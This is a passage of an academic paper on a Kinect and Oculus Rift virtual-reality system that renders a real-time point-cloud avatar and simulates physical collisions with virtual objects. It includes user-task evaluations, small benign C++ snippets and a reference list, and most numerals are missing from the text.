updates the point cloud data to their respective opengl buffers and to the bullet engine objects in order to create the point cloud graphic visualization and simulate interactions between the point cloud and the virtual environment. figure shows the order in which those structures and functions are activated in order to render a frame. this simulation is further discussed below. the whole virtual environment is graphically displayed as a rectangular room. in this room, there is a green block and a colored ball within the user’s field of action, i.e., objects with which the user’s avatar can interact. however, this interaction can only happen through a physical contact which is simulated by the bullet engine. for this to happen, each object, such as the green block, the colored ball and even the walls of the room have to be represented as geometrical shapes inside the bullet engine, otherwise those elements would stay still or move in the room without ever noticing any contact with other objects, percolating through each other as if they did not exist. the bullet engine, as any other physics engine, has to predict the final rectangular and angular position of an object, given its initial position and velocity and using the geometrical representation of each object. this is how the physics simulation occurs and without it there could be no interaction whatsoever between the avatar and the virtual space and objects. assuming that user contact interactions happen mostly near joints like wrist, ankles, knees or elbows for example, it is sensible to consider that approximately any useful contact interaction happens through joints. the kinect v provides joints for tracking and all of them are used in the software implementation. in the bullet engine, each avatar joint (dealt with as if it were a point in camera space) becomes a small sphere, specifically a kinematic rigid body type (coumans, ), capable of colliding with other objects, but not having its position altered by them. this representation is what allows the user to interact with other objects in the virtual room. each joint has a position that is dictated solely by the user and, when each frame is being rendered, this joint position is given to their respective kinematic spheres. this implementation allows for real time tracking and modification of each joint’s position in the physics simulation and leaves the task of calculating velocity, acceleration, momentum and other variables of the objects to the physics engine. after every joint position is updated, the software advances one step with the simulation. if any object such as the green block or the sphere is moving or collides with other objects or with an avatar joint, the physics engine updates their position, rotation and other variables accordingly. this information is also sent to their respective opengl buffers, and now opengl is ready to render a new frame. the final step is to get the motion data from the oculus rift as shown in fig. . this action is needed to properly link the head motion with the opengl, so that there is a macedo silva and moioli ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. correspondence for the hmd position and angles with what can be seen in the opengl virtual environment. in the end, the software sends the frame to the oculus rift. figure shows the roomscene struct calling the render() function in order to finish the rendering cycle and display the final image in the oculus rift. 
this method is novel in the way it uses several kinect and oculus rift features integrated with graphical elements and physics simulations. as pointed out in the introduction, there are few publications that tackle this integrated approach between hmds and motion tracking devices (woodard & sukittanon, ; baldominos, saez & del pozo, ; stavroulia et al., ), yet none of them developed a live avatar with skeleton tracking and environment interactivity such as touching and pushing.
functionality and performance assessment
we conducted a comprehensive set of experiments to evaluate the functionality and performance of the method. first, we analyze the core aspects of avatar visualization with point cloud and polygon surface. the focus is on user experience and visualization perspectives. rendering performance issues and limitations are assessed with the fraps tool (beepa pty ltd., albert park, victoria, canada), which provides the frame rate measurement. we also investigate the interactivity experience with respect to physical collisions of virtual objects with the avatar. we then proceed with three tasks that are able to further evidence the properties of the system. for that, participants were recruited: one who is experienced in interacting with virtual reality environments, and the other who is naive to the usage of this technology. both participants signed the informed consent forms (the brazilian national committee of ethics in research, conep; ethics committee protocol number: irb . . ).
in the first task, we evaluate whether the user avatar is capable of tracking the trajectory of a virtual object performing a -dimensional sinusoidal motion. participants are seated in a comfortable chair and asked to wear the oculus rift hmd. after a fine adjustment of head and body position, the participant sees their arms (point cloud) and a small red virtual block. the block starts a -dimensional sinusoidal trajectory ( . rad/frame update), and the participant has to use their hand to follow the same trajectory as that of the block. performance is evaluated by the coefficient of determination (r²) between the user and the block trajectories.
in the second task, we evaluate whether the system provides a realistic interaction experience, i.e., if the actions performed by the participant are correctly captured by the kinect sensor and displayed as a point cloud avatar that is able to interact with virtual d objects. to accomplish that, participants are asked to jiggle a green block from left to right for as long as they can, making sure that it does not fall. performance is assessed by the number of successful jiggles.
in the third and last task, we investigate whether our oculus plus kinect method performance is similar to that of other systems in terms of trajectory tracking and mismatches between the virtual and real world integration. in this task, the participant is positioned in front of a table, located between six pillars (fig. a). the kinect is placed at ≈ . m in front of the table, and six precision motion capture infrared cameras (optitrack s e, naturalpoint inc.) are attached to the pillars (one to each pillar). figure shows the third task setup: (a) the block reaching task, in which, in each trial, the participant places their right hand to the side of the rightmost line and then moves until reaching the black block, with the six precision motion capture cameras attached one to each pillar, the user wearing the oculus rift hmd and the kinect positioned in front of the table; (b) three task stages as captured by the oculus plus kinect (c) and optitrack (d) systems.
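the first task is scored with the coefficient of determination between the block trajectory and the hand trajectory. a small, self-contained c++ sketch of that computation is given below; it assumes the two trajectories have already been resampled to the same length, and the function is applied to each coordinate (x, y, z) separately.

    #include <vector>
    #include <numeric>

    // coefficient of determination r^2 = 1 - ss_res / ss_tot, comparing a measured
    // trajectory (the user's hand) against a reference trajectory (the block).
    double coefficientOfDetermination(const std::vector<double>& reference,
                                      const std::vector<double>& measured)
    {
        double mean = std::accumulate(reference.begin(), reference.end(), 0.0) / reference.size();
        double ssRes = 0.0, ssTot = 0.0;
        for (size_t i = 0; i < reference.size(); ++i) {
            ssRes += (reference[i] - measured[i]) * (reference[i] - measured[i]);
            ssTot += (reference[i] - mean) * (reference[i] - mean);
        }
        return 1.0 - ssRes / ssTot;  // closer to 1 means the hand followed the block closely
    }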
on the table, we mark two lines ( cm apart) and place a black block right to the side of the leftmost line. then, one participant is asked to position their hand next to the rightmost line and move toward reaching the black block (fig. b). the procedure is repeated for s. using reflective markers and the ir cameras, we are able to accurately measure the participant's hand and block spatial coordinates, as well as detect when the hand crosses either of the lines. during the task, the participant is wearing the oculus rift and sees a corresponding virtual scenario (table and block), together with a point-cloud visualization of the right hand. in this way, we can compare the hand trajectory captured by the oculus plus kinect system with that captured by the optitrack system. also, we can determine if there are any mismatches between the virtual and real world by looking at the spatial coordinates over time of each task element.
results
a method for creating a user-resembling avatar
the software implementation of the described method results in a demonstration capable of creating and rendering a real-time avatar representation of the user. the implementation is written based on the samples provided by the oculus rift sdk, keeping the code elements that deal with the oculus rift communication and adding the code elements that communicate with the kinect handler class, generate the avatar for the opengl library and execute the physics simulation in the bullet engine. using the point cloud approach allows the software to implement two types of avatar: a point-cloud-based avatar and a polygon-based avatar. the first type is shown in fig. . the software creates a point cloud using the camera space points that the kinect provides. each camera space point becomes a point inside the opengl virtual environment with properties of three-dimensional space and rgb color. figure shows the avatar visualization with the point cloud: both left and right frames are projected through the oculus rift lenses, with the point-cloud avatar seen in third-person perspective with a striped look, which is a consequence of the alignment of the point cloud and the position in which the frame was captured in d space; the red dots on the body indicate joint points provided by the kinect that are used for collisions. the other type of avatar uses the camera points to create polygons where each vertex is a point in the three-dimensional space, as shown in fig. . as a result, this implementation produces a sense of continuity in the avatar's body representation, only at the expense of knurled edges. in addition, the software allows the user to see the virtual environment in first-person perspective. this feature is especially important for the immersion factor in our integrated hardware-software approach. the correct head location is obtained with the head position tracking provided by the kinect sdk, while the head rotation and angle are handled by the oculus sdk. this coordination of features provides a solid recreation of the user's field of view while they walk around the physical environment.
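as a rough illustration of the point-based rendering path (again a sketch under assumptions, not the authors' code: the shader program, vertex-attribute setup and buffer creation are presumed to exist), the camera space points and their rgb colors can be packed into a single vertex buffer and drawn as gl_points, which matches the glbufferdata and gldrawarrays calls that appear in the frame rendering cycle.

    #include <GL/glew.h>
    #include <vector>

    struct CloudVertex { float x, y, z, r, g, b; };   // one entry per valid depth pixel

    // uploads the current frame's point cloud and draws it as individual points;
    // the buffer is refilled every frame because the cloud changes with every kinect frame.
    void drawPointCloud(GLuint vbo, const std::vector<CloudVertex>& cloud)
    {
        glBindBuffer(GL_ARRAY_BUFFER, vbo);
        glBufferData(GL_ARRAY_BUFFER, cloud.size() * sizeof(CloudVertex), cloud.data(), GL_DYNAMIC_DRAW);
        glDrawArrays(GL_POINTS, 0, static_cast<GLsizei>(cloud.size()));
    }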
the only limitation is the kinect field of view and the length of the oculus rift cable. in addition, the software allows for a fine adjustment of the head position with the arrow keys or the "a", "w", "d", "s" keys on the keyboard. the kinect also provides support for the recognition of up to six users, and the software implements this feature. every person in front of the kinect sensor is recognized as a user (up to six), and the software offers the option of which user is in first-person mode. this choice is made with the number keys on the keyboard, starting from up to . the " " key serves as a reset mode, detaching the field of view from the last chosen user. figure shows the avatar visualization with a polygon surface: similarly to fig. , both left and right frames are projected through the oculus rift's lenses; in this case, the avatar has a continuous surface, except for its borders and generated artifacts on the base, and the red dots that represent kinect joints can still be noticed behind the avatar and its right index finger.
physical collisions with the avatar
one of the keystones for an immersive virtual reality experience is interactivity. in this approach, we used the bullet physics engine in order to recreate a desired physical interaction simulation between the avatar and an arbitrary virtual object. a green solid rectangular block was created in the virtual environment and placed within the reach of the user's avatar. figure represents the moment when the user tries to balance the green block with their own hands, preventing it from falling. in the code, the programmer can add more objects to the simulation using the bullet physics engine. in our approach, each joint vertex provided by the kinect becomes a bullet static object. it is possible to visualize a general distribution of joints along the body in fig. , where each red dot is a joint. therefore, each red dot can collide with virtual elements, while the dot itself does not suffer any consequence from the collision because its location depends only on the data from the kinect. in fig. , the red dots are the contact points between the avatar's hands and the green block and are responsible for pushing and moving the object under any condition.
avatar interaction with the vr world
avatar interaction with the vr world was assessed with three tasks. in the first task, the block tracking task, both naive and experienced users succeeded in following the sinusoidal block motion (figs. a and c). note the high resemblance between block and user trajectories in the x direction (r² = . ), whilst the y and z directions present a more divergent motion. we proceeded by investigating the user's ability in handling a virtual object. figures b and d show the results for the block jiggling task.
both naive and experienced users were able to manipulate the object, but the latter was significantly better ( % confidence, as indicated by the non-overlapping boxplot notches) at preventing the block from falling. lastly, in the third task (figs. and ), we investigated the tracking performance and analyzed possible mismatches between the real and vr worlds by comparing the oculus plus kinect system with a precision motion capture device (optitrack). as the participant moves their hand from one side of the table toward the black block, both systems successfully capture the trajectory, as displayed in fig. a. note that the optitrack trajectories are smoother than the oculus plus kinect trajectories, which is expected given the optitrack tracking method (infrared) and superior frame rate ( frames/s). the moment at which both systems detect that the participant has reached the block differs by ≈ ms (fig. a, inset panel). regarding the oculus plus kinect system frame rate over the course of the task, we observe from fig. b that it has an average value of ≈ frames/s; the minimum value was frames/s. note that the kinect has a frame rate of frames/s, thus there may be a mismatch between the kinect and the oculus data. nevertheless, the results from the three tasks above indicate that this does not compromise the user experience. taken together, our results indicate that the method suggested in this paper provides a real-time immersive interaction experience. figure shows the avatar interaction with the virtual world: (a) block tracking task, in which, with their hand, the user has to follow a red block as it performs a d sinusoidal trajectory (left to right panels); (b) block jiggling task, in which, using both hands, the user has to jiggle a parallelepiped-shaped green block from left to right whilst ensuring that it does not fall; (c) representative , iterations of block and user trajectories for the x-y-z coordinates, noting that the block sinusoidal trajectory occurs only in the x coordinate; and (d) distribution of successful trials (number of successive left-to-right block jiggles with no falls in n = attempts) for a naive and an experienced user. figure shows the comparison between the oculus plus kinect and optitrack systems: (a) five representative trials of hand trajectories (represented as hand distance from the block over time) for each system, where each trial has a duration of . – s, the blue and red color scales (lighter to darker) relate to the respective trial number, and the inset panel shows the time difference (Δt) between both systems in detecting that the block has been reached; (b) oculus plus kinect system frame rate over the duration of the task ( s).
discussion
an approach for creating a real-time responsive and user-resembling avatar
this work presents a structured method for integrating both hardware and software elements in order to conceive an avatar visualization that is responsive to user movements and can interact with virtual objects. the implementation includes features such as first- and third-person perspective, the choice of which user is the main point of view, and also the possibility to adjust the point of view, as in farther or closer to the central head position, for example. the method was developed in order to increase the immersion experience in vr systems, focusing on avatar resemblance with the user and the interaction with the virtual environment. considering the three levels of self-representation presented by de frança & soares ( ), the system exploits mostly the body and identity levels. on one hand, the creation of the avatar assumes a body position and shape that is intrinsically connected with the user to create a self-representation.
on the other hand, the identity level is supported by a feature that recreates the avatar from real-time user data, allowing them to see their own shapes and clothes in real time. also, the possibility to interact with objects allows the user to sense the limits between their virtual selves and the virtual environment, creating avatar identity. the last level of self-representation, affection, is not directly addressed by the system, as we do not shape or modify the avatar to increase affection. yet it emerges from the affection the user has for their own virtual representation, since it closely resembles their real body shape. therefore, the system presents a good combination of all three levels, which impacts immersion and the sense of embodiment.
exploring three different tasks, we were able to assess the system performance with respect to the immersion and interactivity requirements. in the first task (fig. ), the block tracking task, both naive and experienced users were able to follow the sinusoidal path performed by the block. this indicates that the avatar is easily incorporated by the user and its interaction with elements from the vr world is coherently coupled with actions in the real world. this fact is reinforced by the second task, in which users manipulate a virtual object. the oculus plus kinect system is capable of creating an avatar that is responsive to users' actions, whilst the collision detection module provides a realistic sense of interaction with the real world. the statistically significant difference in performance between naive and experienced vr users in a relatively easy manual coordination task stresses that the interaction with virtual objects can improve with practice. also, incorporating a haptic feedback system may improve user experience in the virtual world (lecuyer et al., ; otaduy, okamura & subramanian, ). finally, in the third task (fig. ), results indicate that the mismatch between the virtual world and real world actions is kept to a minimum and does not compromise the user immersion experience.
limitations and further improvements
point cloud visualization and program parallelization
the core concept in this implementation involves the visualization of a point cloud. this visualization can be either as points floating in the virtual space for each data point in the point cloud or as a surface recreation from the point cloud data. as a result, the quality of the avatar graphical visualization is inherently dependent on the point cloud data quality. the point cloud data provided by the kinect is noisy, as seen in fig. . the implementation for the avatar visualization in this work sends all kinect point data to the opengl library, without performing any analysis or filtering. the result is an avatar visualization that is easily recognizable as the current user, but presents noisy and undefined borders. a first improvement over this method would be to implement a data filter to exclude points from the visualization that go beyond a predefined body contour. a first method, shown in point cloud library ( ), involves trimming points whose distance falls outside an interval defined by the mean and the standard deviation of the global distances, assuming a gaussian distribution of the distances.
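a minimal c++ sketch of that filter, using the statisticaloutlierremoval class from the point cloud library tutorial referenced above, is shown below; the mean-k and standard-deviation multiplier values are illustrative assumptions rather than values used in this work.

    #include <pcl/point_types.h>
    #include <pcl/filters/statistical_outlier_removal.h>

    // trims points whose mean distance to their neighbours falls outside the
    // mean +/- (multiplier * std dev) interval of the global distance distribution.
    pcl::PointCloud<pcl::PointXYZRGB>::Ptr
    filterCloud(const pcl::PointCloud<pcl::PointXYZRGB>::Ptr& input)
    {
        pcl::PointCloud<pcl::PointXYZRGB>::Ptr output(new pcl::PointCloud<pcl::PointXYZRGB>);
        pcl::StatisticalOutlierRemoval<pcl::PointXYZRGB> sor;
        sor.setInputCloud(input);
        sor.setMeanK(50);             // neighbours used to estimate each point's mean distance (assumed value)
        sor.setStddevMulThresh(1.0);  // threshold multiplier on the standard deviation (assumed value)
        sor.filter(*output);
        return output;
    }

points discarded by the filter would simply not be uploaded to opengl, which should reduce the noisy and undefined borders mentioned above.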
other methods (schall, belyaev & seidel, ) involve heavy calculations and, although they might produce a better result, the filtered point cloud may not significantly improve the visualization. the point cloud itself imposes another problem that affects the speed of the system. during the rendering cycle, after the data is acquired from the kinect, the system has to convert all the data points from the depth space to the camera space (i.e., the real-world d dimensions). this processing is done on the cpu because it uses kinect-specific functions, and this limits the processing throughput according to the number of cores the cpu has. in addition, there are several methods to create a surface from the point cloud. the method used to create fig. consists of connecting the camera space points in groups of three, considering the d matrix from which they were acquired, and rendering a triangle with opengl. however, using the polygon rendering mode with openmp may cause the program to suffer a severe drop in rendered frames per second, thus further work should explore this issue. when creating a smooth surface from the point cloud, it is important to observe how the method will affect the frame throughput of the opengl engine. an optimal implementation would seek to parallelize this process within the graphics processing unit (gpu). the implementation of a point cloud triangulation algorithm such as the one presented in scheidegger, fleishman & silva ( ) would have to be tested for real-time applications.
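the grouping-into-triangles step mentioned above can be sketched as follows. this is a simplified illustration rather than the authors' implementation: it assumes a per-pixel validity mask (marking depth pixels with usable data) and produces an index list over the camera space points that would later be uploaded to opengl and drawn as triangles.

    #include <vector>
    #include <cstdint>

    // builds two triangles per 2x2 cell of the depth grid, skipping cells that
    // contain invalid points so that triangles are not stretched across holes.
    std::vector<uint32_t> buildSurfaceIndices(int width, int height,
                                              const std::vector<bool>& valid)
    {
        std::vector<uint32_t> indices;
        for (int y = 0; y + 1 < height; ++y) {
            for (int x = 0; x + 1 < width; ++x) {
                uint32_t i0 = y * width + x, i1 = i0 + 1;
                uint32_t i2 = i0 + width,   i3 = i2 + 1;
                if (valid[i0] && valid[i1] && valid[i2] && valid[i3]) {
                    indices.insert(indices.end(), { i0, i2, i1 });
                    indices.insert(indices.end(), { i1, i2, i3 });
                }
            }
        }
        return indices;  // e.g. uploaded with glBufferData and drawn as GL_TRIANGLES
    }

skipping cells with invalid points keeps the surface from stretching across the noisy borders discussed earlier, at the cost of small holes along the silhouette.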
integration with eye and gaze tracking technologies
one of the key factors for immersion, as mentioned by alshaer, regenbrecht & o'hare ( ), is the field of view (fov). in general, the fov or visual field is the area of space within which an individual can detect the presence of a visual stimulus (dagnelie, ). for vr, one might assume that matching the fov of vr headsets with that of our own eyes would be ideal, but that is not necessarily the case. a widening of the field of view is beneficial to the immersion factor, as stated by prothero & hoffman ( ) and alshaer, regenbrecht & o'hare ( ). nowadays, most vr headsets have a field of view of about vertical degrees (digitaltrends, ), whereas the field of view of the human eye with binocular view is about vertical degrees. however, there are other factors, such as depth-of-field (dof) blur, that affect the perception of the field of view. hillaire et al. ( ) mention that technologies such as eye and gaze tracking can be used to improve the depth-of-field blur, considering that dof simulates the fact that humans perceive sharp objects only within some range of distance around the focal distance, and thus humans do not use the whole fov at the same time. hillaire et al. ( ) concluded that eye and gaze tracking technologies could be used to exploit visual effects that depend on the user's focal point, aiming to increase usage comfort and immersion within vr systems. nowadays, there are a few options that implement eye tracking capabilities in hmds. the first one is tobii eye tracking, which tries to perform custom adaptations to link an existing eye tracking device to an hmd. the second and most promising option would be the fove vr headset, which implements the integration of the hmd and eye tracking in the system as a whole. however, fove is currently open for pre-orders only and software development for this device is still in its initial steps.
alternative approach for an improved physical simulation
in its current version, each detected skeleton joint from the kinect becomes a small sphere for physical simulation within the bullet engine. as a result, only a few predetermined points are able to interact with the virtual objects in the simulated environment. this implementation renders a realistic physical simulation when the user pushes a virtual object, but performance deteriorates when the user tries to hold objects, especially small ones. this happens because the kinect provides only three skeleton joints for the hand, which is not enough for a realistic approximation of hand interaction in some situations. this limitation extends to the whole body for different interactions, when the number of points does not allow for a realistic approximation of body interactions. an improvement over this implementation would be to use a greater number of points for approximating body interactions. in this approach, a much greater number of points from the point cloud would become spherical rigid bodies in the bullet engine instead of the limited skeleton joints. in this way, there would be a better sense of interaction with the body surface because the gap between contact points would decrease and improve the perception of continuity. using a greater number of points is a reasonable alternative given that the bullet engine does not officially allow for kinematic surfaces in its current implementation, which discourages developing physical interactions with an actual surface obtained from the point cloud. however, as the number of rigid bodies in the simulation increases, the bullet simulation slows down, which would affect the number of frames the application could provide for the oculus rift. a possible solution for this problem is at an experimental stage and will be available in future versions of the bullet engine. the bullet engine developers are using opencl to parallelize the simulation on the gpu and, as a result, the engine can handle real-time simulation of thousands of objects simultaneously (harada, ). this alternative solution for physical interaction could improve the level of realism the software provides, especially the finesse with which each touch is calculated. the user would be able to handle objects with their fingers, for example, depending on how many points from the point cloud are used, and whole-body interactions would be better illustrated for the body surface, instead of the body-joint approximation.
interfacing with other platforms
in the last few years, virtual reality has become much more accessible. the oculus rift and the kinect were surely promoters of this revolution by taking really expensive hardware used for scientific research and reshaping it to the consumer price level. yet this revolution continues within the realm of mobile platforms, spreading the virtual reality concept even more to the masses. the google cardboard is a good example: for a reduced price, one can buy or build a head-mounted display that uses one's own smartphone as a display for a virtual reality environment.
in order to use the present system in a mobile setting, we have to consider how the system is organized and how the interface with each device works. if the oculus rift were to be substituted by a smartphone-based hmd, there would still be the need to use the kinect to create the avatar representation. however, building an interface to connect the kinect directly with a mobile platform is challenging. a possible solution to this problem is to implement a webservice whose main task would be to pipe pre-processed kinect frame data to the smartphone. in this architecture, the bulk of the processing, which is converting depth points to d space, would be done on the desktop computer, and a portable graphics rendering solution such as opengl es would be able to use this data to create the virtual environment similarly to what happens with the oculus rift. a similar project was developed by peek ( ), which can send depth and skeleton data to a windows phone.
conclusion
vr systems are constantly improving, yet they still lack a few features that could enhance the user experience. the immersion factor is crucial for user engagement, allowing for life-like psychological and physical user responses and scientific experiments. there are still a few elements that influence the immersion experience. the avatar is one of them and, aligned with wrzesien et al. ( ), who showed that appearance resemblance with the user creates a stronger set of emotional responses, avatars that recreate user features will probably provide an improved virtual reality immersion. this work aimed to create a user avatar with currently available commercial technology. we used the kinect and the oculus rift for this purpose. the former is responsible for acquiring color, depth and movement data from the environment, which allows the latter to visually recreate an avatar representation of the user. together with a physics engine, we provide avatar interactions with objects in the virtual environment. the method presented in this work lies within the realm of vr applications, especially those which require avatar representation and physical interactions with the virtual environment. the hardware and software approach we used is expandable to other systems. it is innovative in the way it binds the hardware and software capabilities by integrating the virtual environment with skeleton tracking, body detection, and object collisions in order to create a unique, user-resembling and interactive avatar. all of these features together appeal to the final user and contribute to an immersive interaction with virtual reality.
acknowledgements
we acknowledge the support from the staff and students of the edmond and lily safra international institute of neuroscience.
additional information and declarations
funding
this work was supported by the brazilian financing agency for studies and projects (finep), the brazilian ministry of science, technology and innovation (mcti), the national institute of science and technology (inct) brain machine-interface (incemaq/mcti/cnpq/capes/fapern), and the ministry of education (mec). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.
grant disclosures
the following grant information was disclosed by the authors:
brazilian financing agency for studies and projects (finep).
brazilian ministry of science, technology and innovation (mcti).
national institute of science and technology (inct).
brain machine-interface (incemaq/mcti/cnpq/capes/fapern).
ministry of education (mec).
competing interests
the authors declare there are no competing interests.
author contributions
• igor macedo silva conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper.
• renan c. moioli conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper.
ethics
the following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): the brazilian national committee of ethics in research (comissão nacional de Ética em pesquisa - conep) granted ethical approval for the santos dumont institute to carry out the study within its facilities (ethical application ref: . . ).
data availability
the following information was supplied regarding data availability: github: https://github.com/igormacedo/liveinteractiveavatar.
supplemental information
supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information.
references
abulrub ag, attridge a, williams ma. . virtual reality in engineering education: the future of creative learning. international journal of emerging technologies in learning ( ): – doi . /ijet.v i . .
alshaer a, regenbrecht h, o'hare d. . immersion factors affecting perception and behaviour in a virtual reality power wheelchair simulator. applied ergonomics : – doi . /j.apergo. . . .
asus. . xtion pro live. available at https://www.asus.com/us/ d-sensor/xtion_pro_live/specifications/ (accessed on june ).
baldominos a, saez y, del pozo cg. . an approach to physical rehabilitation using state-of-the-art virtual reality and motion tracking technologies. procedia computer science (december): – doi . /j.procs. . . .
clark ra, pua yh, fortin k, ritchie c, webster ke, denehy l, bryant al. . validity of the microsoft kinect for assessment of postural control. gait and posture ( ): – doi . /j.gaitpost. . . .
clark ra, pua y-h, oliveira cc, bower kj, thilarajah s, mcgaw r, hasanki k, mentiplay bf. . reliability and concurrent validity of the microsoft xbox one kinect for assessment of standing balance and postural control. gait & posture ( ): – doi . /j.gaitpost. . . .
coumans e. . bullet . physics sdk manual. available at http://bulletphysics.org.
cuperus aa, laken m, van den hout ma, engelhard im. . degrading emotional memories induced by a virtual reality paradigm. journal of behavior therapy and experimental psychiatry : – doi . /j.jbtep. . . .
dagnelie g (ed.) . visual prosthetics: physiology, bioengineering, rehabilitation. new york: springer.
de frança acp, soares mm. . dialogical self on virtual reality systems: presence and embodiment in human situated interaction. procedia manufacturing (ahfe): – doi . /j.promfg. . . .
depthsense. . depthsense cameras. available at https://www.softkinetic.com/products/depthsensecameras (accessed on june ).
didehbani n, allen t, kandalaft m, krawczyk d, chapman s. . virtual reality social cognition training for children with high functioning autism. computers in human behavior : – doi . /j.chb. . . .
digitaltrends. . spec comparison: does the rift's touch update make it a true vive competitor? available at https://www.digitaltrends.com/virtual-reality/oculus-rift-vs-htc-vive/ (accessed on june ).
donati arc, shokur s, morya e, campos dsf, moioli rc, gitti cm, augusto pb, tripodi s, pires cg, pereira ga, brasil fl, gallo s, lin aa, takigami ak, aratanha ma, joshi s, bleuler h, cheng g, rudolph a, nicolelis mal. . long-term training with a brain-machine interface-based gait protocol induces partial neurological recovery in paraplegic patients. scientific reports (april): doi . /srep .
draganov ir, boumbarov ol. . investigating oculus rift virtual reality display applicability to medical assistive system for motor disabled patients. in: ieee th international conference on intelligent data acquisition and advanced computing systems: technology and applications (idaacs). vol. . piscataway: ieee, – doi . /idaacs. . .
fox j, bailenson jn. . virtual self-modeling: the effects of vicarious reinforcement and identification on exercise behaviors. media psychology ( ): – doi . / .
gonzalez-jorge h, riveiro b, vazquez-fernandez e, martínez-sánchez j, arias p. . metrological evaluation of microsoft kinect and asus xtion sensors. measurement ( ): – doi . /j.measurement. . . .
harada t. . a parallel constraint solver for a rigid body simulation. in: siggraph asia sketches on–sa ' . new york: acm press, .
hillaire s, lecuyer a, cozot r, casiez g. . using an eye-tracking system to improve camera motions and depth-of-field blur effects in virtual environments. in: ieee virtual reality conference. piscataway: ieee, – doi . /vr. . .
leapmotion. . leap motion api overview. available at https://developer.leapmotion.com/documentation/csharp/devguide/leap_overview.html (accessed on june ).
lecuyer a, vidal m, joly o, megard c, berthoz a. . can haptic feedback improve the perception of self-motion in virtual reality? in: proceedings of the th international symposium on haptic interfaces for virtual environment and teleoperator systems (haptics' ). – doi . /haptic. . .
linsen l. . point cloud representation. technical report – . fakultät für informatik, universität karlsruhe (th).
lugrin jl, landeck m, latoschik me. . avatar embodiment realism and virtual fitness training. in: proceedings of the ieee virtual reality conference. piscataway: ieee, – doi . /vr. . .
luigi m, massimiliano m, aniello p, gennaro r, virginia pr. . on the validity of immersive virtual reality as tool for multisensory evaluation of urban spaces. energy procedia : – doi . /j.egypro. . . .
microsoft. a. ms kinect v technical specifications. available at https://msdn.microsoft.com/en-us/library/jj .aspx (accessed on may ).
microsoft. b. ms kinect v technical specifications. available at https://developer.microsoft.com/en-us/windows/kinect/hardware (accessed on may ).
mills s. . virtual reality—user issues. in: iee colloquium on virtual reality—user issues. london: iee, – doi . /ic: .
morel m, bideau b, lardy j, kulpa r. . advantages and limitations of virtual reality for balance assessment and rehabilitation. clinical neurophysiology ( – ): – doi . /j.neucli. . . .
notzon s, deppermann s, fallgatter a, diemer j, kroczek a, domschke k, zwanzger p, ehlis ac. . psychophysiological effects of an itbs modulated virtual reality challenge including participants with spider phobia. biological psychology : – doi . /j.biopsycho. . . .
otaduy ma, okamura a, subramanian s. . haptic technologies for direct touch in virtual reality. in: acm siggraph courses, siggraph' . new york: acm, : – : .
otte k, kayser b, mansow-model s, verrel j, paul f, brandt au, schmitz-hubsch t. . accuracy and reliability of the kinect version for clinical measurement of motor function. plos one ( ): – doi . /journal.pone. .
paolini g, peruzzi a, mirelman a, cereatti a, gaukrodger s, hausdorff j, della croce u. . validation of a method for real time foot position and orientation tracking with microsoft kinect technology for use in virtual reality and treadmill based gait training programs. ieee transactions on neural systems and rehabilitation engineering (c): – .
park sy, kim sm, roh s, soh m-a, lee sh, kim h, lee ys, han dh. . the effects of a virtual reality treatment program for online gaming addiction. computer methods and programs in biomedicine : – doi . /j.cmpb. . . .
peek b. . connecting to the kinect remotely with the kinect service. available at https://channel .msdn.com/coding fun/kinect/connecting-to-the-kinect-remotely-with-the-kinect-service (accessed on june ).
playstation vr. . ps vr in detail technical specifications. available at https://www.playstation.com/en-au/explore/playstation-vr/tech-specs/ (accessed on june ).
point cloud library. . removing outliers using a statisticaloutlierremoval filter. available at http://pointclouds.org/documentation/tutorials/statistical_outlier.php (accessed on september ).
portman me, natapov a, fisher-gewirtzman d. . to go where no man has gone before: virtual reality in architecture, landscape architecture and environmental planning. computers, environment and urban systems : – doi . /j.compenvurbsys. . . .
prothero j, hoffman h. . widening the field of view increases the sense of presence within immersive virtual environments. human interface technology laboratory tech. rep. university of washington.
remondino f. . from point cloud to surface: the modeling and visualization problem. international archives of photogrammetry, remote sensing and spatial information sciences xxxiv: – .
rudinskiy m, bula m, stahl t, davies n, fitzgerald m, d'andrea s, gielo-perczak k. . dual actuated gait rehabilitation treadmill implementing virtual reality and visual postural feedback. in: th annual northeast bioengineering conference (nebec). piscataway: ieee, – .
rusu rb, cousins s. . d is here: point cloud library (pcl). in: robotics and automation (icra), ieee international conference on. piscataway: ieee, – .
schall o, belyaev a, seidel h-p. . robust filtering of noisy scattered point data. in: proceedings eurographics/ieee vgtc symposium point-based graphics, . piscataway: ieee.
scheidegger ce, fleishman s, silva ct. . triangulating point set surfaces with bounded error. in: desbru m, pottmann h, eds. eurographics symposium on geometry processing . the eurographics association.
shokur s, gallo s, moioli rc, donati arc, morya e, bleuler h, nicolelis mal. . assimilation of virtual legs and perception of floor texture by complete paraplegic patients receiving artificial tactile feedback. scientific reports : article doi . /srep .
stavroulia ke, ruiz-harisiou a, manouchou e, georgiou k, sella f, lanitis a. . a d virtual environment for training teachers to identify bullying. in: proceedings of the th mediterranean electrotechnical conference: intelligent and efficient technologies and services for the citizen, melecon , april. – .
weichert f, bachmann d, rudak b, fisseler d. . analysis of the accuracy and robustness of the leap motion controller. sensors ( ): – doi . /s .
woodard w, sukittanon s. . interactive virtual building walkthrough using oculus rift and microsoft kinect. in: southeastcon . piscataway: ieee, – .
wrzesien m, rodríguez a, rey b, alcañiz m, baños rm, vara md. . how the physical similarity of avatars can influence the learning of emotion regulation strategies in teenagers. computers in human behavior : – doi . /j.chb. . . .
zhao w, espy dd, reinthal ma, feng h. . a feasibility study of using a single kinect sensor for rehabilitation exercises monitoring: a rule based approach. in: ieee symposium on computational intelligence in healthcare and e-health (cicare). piscataway: ieee, – .
zheng j, chan k, gibson i. . virtual reality. ieee potentials ( ): – doi . / . .
